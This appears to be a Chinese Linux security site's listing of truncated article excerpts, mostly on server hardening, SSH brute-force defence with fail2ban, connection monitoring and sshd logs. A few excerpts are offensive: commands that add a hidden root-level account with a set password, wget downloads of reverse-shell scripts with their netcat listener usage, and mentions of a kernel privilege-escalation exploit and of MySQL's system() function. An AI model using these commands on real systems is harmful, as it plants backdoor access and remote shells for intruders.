useradd -g 0 -u 0 -o mickey echo mickey:minnie |chpasswd 这两条命令的意思为：添加一个具有 root 权限的用户名为 mickey，密码为 minnie 的系统帐号。...

在线下载 可以用 wget http://www.linuxso.com/linuxexp/shell.cwget http://www.linuxso.com/linuxexp/shell.pl C语言版 用法说明:在外网linux上监听 nc -l -p 端口gcc -o shell shell.c./shell ip 端口 perl版 用法;在外网linux上监听 nc -l -p 端口perl shell.pl ip 端口...

Ubuntu下搞定root帐户方法： 1、使屏蔽root帐户现身： 以下是打开X下的终端进行修改的全过程：(//为后面注释内容) zk@zkubuntu:~$ su //没搞定之前想进root帐户Password: //输入密码su: Authentication failure //提示失败抱歉zk@zkubuntu:~$ passwd root//想在一般帐户下更...

安全是相对的，使用本文介绍的这些方法不能绝对保证你的服务器是安全的，但可以肯定的是它比以前更安全，也比大多数服务器要安全，至少菜鸟级的黑客是无法攻破的;安全是一个持续的过程，它不是一蹴而就的，我们认为，在安全领域是需要一点偏执精神的。 本文所列举的这些保护...

Unix操作系统的安全性是众所周知的。但是如果要你说出Unix系统到底安全在哪里，估计也没有人能够说出一个所以然来。 一、同一个命令不同用户不同的权限。 Date命令是Unix系统的一个常用命令，其显示了系统的日期与时间。但是不同的用户角色其具有不同的功能。如是系统管理员...

网络上的计算机很容易被黑客利用工具或其它手段进行扫描，以寻找系统中的漏洞，然后再针对漏洞进行攻击。 通过伪装Linux系统，给黑客设置系统假象，可以加大黑客对系统的分析难度，引诱他们步入歧途，从而进一步提高计算机系统的安全性。下面以Red Hat Linux为例，针对几种...

系统安全高手 Dan Rosenberg 发布了一段 C 程序，这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞，可以导致本地帐号对系统进行拒绝服务或特权提升，也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell，以下在 update 过的 Ubuntu 10.04 Server LTS...

在Linux下用如下命令实时监控 netstat -anp|grep :22 对于本地随即端口，外部是22端口的行 记住对应的PID（最右边），再使用如下命令： ps -ef 找到每个PID对应的程序，那么此程序很可能就是黑客程序，然后再对此程序做进一步分析...

最近deepvps发现自己的VPS每天都被不停的探测SSH和VSFTP的密码。虽然已经做了一些简单的防护，但是总觉的不保险。为了彻底解决这个问题。deepvps发现了fail2ban这款软件不错，可以有效阻止这样的攻击，下面是基本的安装配置方法： 一、下载安装 #wget http://cdnetworks-kr-...

mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的 明天再看看函数手册，再装一个实验一下。 mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysq...

如何保证安全的最大化呢？量体裁衣，有的放矢，取舍得当是关键。现从以下几个方面加以详述。 控制文件的属性和权限 密切关注文件的属性和权限设置是保证主机文件系统完整性的至关紧要的操作。 两种特殊的文件访问权限分别是SUID(八进制为4000)和SGID（八进制为2000）。设置...

Nov 3 01:22:06 server sshd[11879]: Failed password for root from 123.127.5.131 port 38917 ssh2 Nov 3 01:22:17 server sshd[11880]: Received disconnect from 123.127.5.131: 13: The user canceled authentication. Nov 3 03:15:08 server sshd[17524]: pam_unix(ss...